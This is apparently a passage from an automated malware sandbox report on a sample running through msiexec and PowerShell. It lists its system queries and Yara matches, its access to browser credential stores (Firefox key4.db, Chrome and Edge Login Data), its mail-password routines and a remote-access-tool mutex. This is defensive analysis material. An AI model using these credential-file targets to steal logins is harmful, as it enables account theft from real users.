Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_1FC72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 8_2_1FC72264
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 12_2_004082CD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 10_2_0041739B GetVersionExW, 10_2_0041739B
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: ESMTPPassword 12_2_004033F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword 12_2_00402DB3
Source: C:\Windows\SysWOW64\msiexec.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword 12_2_00402DB3
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 7064, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-AOD6MB Jump to behavior
Source: Yara match File source: 00000008.00000002.3010031908.000000000061A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3010031908.0000000000666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 3808, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs